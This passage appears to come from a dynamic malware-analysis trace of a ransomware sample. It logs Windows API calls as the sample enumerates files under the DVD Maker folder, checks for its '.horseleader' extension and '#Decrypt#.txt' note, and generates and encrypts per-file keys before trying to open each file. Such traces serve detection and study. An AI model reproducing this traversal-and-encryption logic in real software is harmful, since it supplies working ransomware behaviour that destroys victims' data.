lpString2="#Decrypt#.txt") returned 1 [0251.758] lstrcmpW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.758] lstrlenW (lpString=".testttjffg") returned 11 [0251.758] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.758] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.758] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eae790c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eae790c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_performance_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.758] lstrcmpiW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.758] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned 83 [0251.758] StrStrIW (lpFirst="rectangle_performance_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.759] lstrcmpW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.759] lstrcmpW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.759] lstrlenW (lpString=".testttjffg") returned 11 [0251.759] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.759] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.759] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.759] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb0da69, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb0da69, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_photo_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.759] lstrcmpiW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.759] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned 77 [0251.759] StrStrIW (lpFirst="rectangle_photo_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.759] lstrcmpW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.759] lstrcmpW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.759] lstrlenW (lpString=".testttjffg") returned 11 [0251.760] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.760] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.760] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea754f5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea754f5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_plain_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.761] lstrcmpiW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.761] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned 77 [0251.761] StrStrIW (lpFirst="rectangle_plain_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.761] lstrcmpW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.761] lstrcmpW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.761] lstrlenW (lpString=".testttjffg") returned 11 [0251.761] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.761] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.761] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.762] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb33bc6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb33bc6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_postage_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.762] lstrcmpiW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.762] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned 79 [0251.762] StrStrIW (lpFirst="rectangle_postage_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.762] lstrcmpW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.762] lstrcmpW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.762] lstrlenW (lpString=".testttjffg") returned 11 [0251.762] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.762] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.762] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.763] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_scrapbook_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.763] lstrcmpiW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.763] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned 81 [0251.763] StrStrIW (lpFirst="rectangle_scrapbook_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.763] lstrcmpW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.763] lstrcmpW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.763] lstrlenW (lpString=".testttjffg") returned 11 [0251.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.770] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb59d23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb59d23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_specialocc_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.770] lstrcmpiW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.770] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned 82 [0251.770] StrStrIW (lpFirst="rectangle_specialocc_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.770] lstrcmpW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.770] lstrcmpW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.770] lstrlenW (lpString=".testttjffg") returned 11 [0251.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.770] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.771] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_travel_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.771] lstrcmpiW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.771] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned 78 [0251.771] StrStrIW (lpFirst="rectangle_travel_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.771] lstrcmpW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.771] lstrcmpW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.771] lstrlenW (lpString=".testttjffg") returned 11 [0251.771] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.771] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.771] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.772] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eb7fe80, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eb7fe80, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="rectangle_widescreen_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.772] lstrcmpiW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.772] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned 82 [0251.772] StrStrIW (lpFirst="rectangle_widescreen_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.772] lstrcmpW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.772] lstrcmpW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.772] lstrlenW (lpString=".testttjffg") returned 11 [0251.772] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.772] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.772] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.773] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ResizingPanels", cAlternateFileName="RESIZI~1")) returned 1 [0251.773] lstrcmpiW (lpString1="ResizingPanels", lpString2="Windows") returned -1 [0251.773] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 62 [0251.773] lstrcmpW (lpString1="ResizingPanels", lpString2=".") returned 1 [0251.773] lstrcmpW (lpString1="ResizingPanels", lpString2="..") returned 1 [0251.773] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.773] GetProcessHeap () returned 0x780000 [0251.773] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.773] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*") returned 64 [0251.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.776] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.776] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\.") returned 64 [0251.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.776] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.777] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\..") returned 65 [0251.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.777] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7091adcb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7091adcb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.777] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.777] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png") returned 80 [0251.777] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.777] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.777] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.777] lstrlenW (lpString=".testttjffg") returned 11 [0251.777] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.777] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.777] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.778] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a4b8b3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a4b8b3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.778] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.778] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png") returned 82 [0251.778] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.778] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.778] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.778] lstrlenW (lpString=".testttjffg") returned 11 [0251.778] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.778] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.778] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.779] FindNextFileW (in: 